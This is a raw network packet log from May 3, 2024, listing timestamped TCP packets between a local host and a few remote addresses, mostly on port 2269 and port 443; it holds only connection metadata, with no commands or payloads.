May 3, 2024 11:21:02.998245955 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.998289108 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.999747992 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.999783993 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.076342106 CEST	443	49703	23.1.237.91	192.168.2.5
May 3, 2024 11:21:03.076494932 CEST	49703	443	192.168.2.5	23.1.237.91
May 3, 2024 11:21:03.410712004 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.410762072 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.506104946 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.521766901 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.751885891 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.751966953 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.760807991 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.760873079 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.760900021 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.760941982 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.763681889 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.763741970 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.765845060 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.765906096 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.767431974 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.767476082 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.768812895 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.768867016 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.769886971 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.769938946 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.775043011 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.775099039 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.778096914 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.778153896 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.780666113 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.780724049 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.782780886 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.782835007 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.784827948 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.784876108 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.787781000 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.787823915 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.793864965 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.793912888 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.796941996 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.796989918 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.798841953 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.798887968 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.801783085 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.801826954 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.803002119 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.803051949 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.803935051 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.803978920 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.805959940 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.806004047 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.808147907 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.808161974 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.808196068 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.808219910 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.809834003 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.809879065 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.811695099 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.811954975 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.811994076 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.812033892 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.812777042 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.812866926 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:03.813879967 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.816112041 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:03.816171885 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.155150890 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.303116083 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.303189039 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.484185934 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.485174894 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.485229969 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.487895966 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.489161968 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.489219904 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.489881039 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.490828037 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.490879059 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.500138998 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.500180960 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.500226021 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.504170895 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.504281044 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.504326105 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.504400015 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.504503012 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.504543066 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.506046057 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.508948088 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.509021997 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.509996891 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.513791084 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.513849974 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.514971018 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.561317921 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.618928909 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.720756054 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.759913921 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.760910988 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.760986090 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.776276112 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.776293039 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.776336908 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.776377916 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.778223038 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.778255939 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.778264046 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.778323889 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.778366089 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.778750896 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.780966997 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.781019926 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.783128023 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.784976006 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.785021067 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.786161900 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.787866116 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.787910938 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.789813995 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.790990114 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.791033030 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.792882919 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.793984890 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.794030905 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.830059052 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.840887070 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.840930939 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.854495049 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.854577065 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.854628086 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.855899096 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:04.908802032 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:04.991723061 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.181138992 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.182084084 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.182132006 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.182913065 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.229049921 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.268122911 CEST	49716	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.268157005 CEST	443	49716	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.268209934 CEST	49716	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.268286943 CEST	49717	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.268310070 CEST	443	49717	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.268348932 CEST	49717	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.268676996 CEST	49718	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.268716097 CEST	443	49718	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.268781900 CEST	49718	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.268870115 CEST	49719	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.268892050 CEST	443	49719	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.268949986 CEST	49719	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.269925117 CEST	49719	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.269936085 CEST	443	49719	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.270085096 CEST	49718	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.270096064 CEST	443	49718	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.270308018 CEST	49717	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.270318031 CEST	443	49717	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.270426989 CEST	49716	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.270438910 CEST	443	49716	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.303798914 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.304794073 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.304840088 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.331351042 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.332941055 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.332988977 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.334053040 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.334778070 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.334816933 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.336764097 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.337778091 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.337820053 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.338788033 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.341089010 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.341136932 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.343172073 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.344860077 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.344902992 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.346774101 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.349720955 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.349761963 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.350953102 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.351865053 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.351902962 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.360901117 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.404186010 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.450813055 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.452735901 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.453006983 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.454727888 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.462404013 CEST	443	49718	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.462538004 CEST	443	49716	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.462541103 CEST	443	49719	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.462816000 CEST	443	49717	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.462833881 CEST	49718	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.462852955 CEST	443	49718	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.463061094 CEST	49719	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.463069916 CEST	443	49719	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.463181973 CEST	49716	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.463192940 CEST	443	49716	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.463390112 CEST	49717	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.463396072 CEST	443	49717	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.463850021 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.463900089 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.464181900 CEST	443	49718	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.464217901 CEST	443	49716	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.464219093 CEST	443	49719	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.464234114 CEST	49718	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.464296103 CEST	49716	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.464409113 CEST	49719	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.464575052 CEST	443	49717	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.464673042 CEST	49717	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.465827942 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.465866089 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.465909958 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.467861891 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.467941046 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.467982054 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.468024015 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.468120098 CEST	49718	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.468183041 CEST	443	49718	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.469790936 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.469830990 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.472157955 CEST	49719	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.472232103 CEST	443	49719	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.472645044 CEST	49716	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.472712994 CEST	443	49716	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.472955942 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.473345041 CEST	49717	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.473413944 CEST	443	49717	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.473660946 CEST	49718	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.473670959 CEST	443	49718	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.474322081 CEST	49719	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.474328041 CEST	443	49719	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.474931002 CEST	49716	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.474944115 CEST	443	49716	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.475424051 CEST	49717	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.475430012 CEST	443	49717	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.482868910 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.482883930 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.482912064 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.483061075 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.483100891 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.483174086 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.484008074 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.484021902 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.484052896 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.484730005 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.484776974 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.493838072 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.493851900 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.493895054 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.494147062 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.494174957 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.494211912 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.495085955 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.495100975 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.495145082 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.497009993 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.500752926 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.500799894 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.526261091 CEST	49718	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.526261091 CEST	49719	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.526278019 CEST	49717	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.526278019 CEST	49716	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.663832903 CEST	443	49718	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.667893887 CEST	443	49718	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.668020964 CEST	49718	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.671119928 CEST	49718	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.671128988 CEST	443	49718	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.707926035 CEST	49719	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.708017111 CEST	443	49719	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.708185911 CEST	443	49719	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.708245039 CEST	49719	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.708256960 CEST	49719	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.724558115 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.732826948 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.732881069 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.770709038 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.770761013 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.772733927 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.772788048 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.851973057 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.854985952 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.855038881 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.877628088 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.882040024 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.882116079 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.883943081 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.885997057 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.886045933 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.887959957 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.889875889 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.889918089 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.892000914 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.892885923 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.892932892 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.893980980 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.895982981 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.896024942 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.896898031 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.898032904 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.898078918 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.906780958 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.907120943 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.907170057 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.909708023 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.961548090 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:05.971942902 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:05.986584902 CEST	443	49716	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.986722946 CEST	443	49716	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.986788988 CEST	49716	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.987556934 CEST	49716	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.987579107 CEST	443	49716	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.989860058 CEST	49722	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.989898920 CEST	443	49722	142.251.41.4	192.168.2.5
May 3, 2024 11:21:05.990313053 CEST	49722	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.990565062 CEST	49722	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:05.990578890 CEST	443	49722	142.251.41.4	192.168.2.5
May 3, 2024 11:21:06.025615931 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.026226997 CEST	443	49717	142.251.41.4	192.168.2.5
May 3, 2024 11:21:06.026350975 CEST	443	49717	142.251.41.4	192.168.2.5
May 3, 2024 11:21:06.026504993 CEST	49717	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:06.027101994 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.027240038 CEST	49717	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:06.027256012 CEST	443	49717	142.251.41.4	192.168.2.5
May 3, 2024 11:21:06.029961109 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.030477047 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.046101093 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.047707081 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.049984932 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.050052881 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.050997019 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.052952051 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.053011894 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.054020882 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.054084063 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.055938959 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.059936047 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.060969114 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.061023951 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.083015919 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.083092928 CEST	2269	49709	37.120.235.122	192.168.2.5
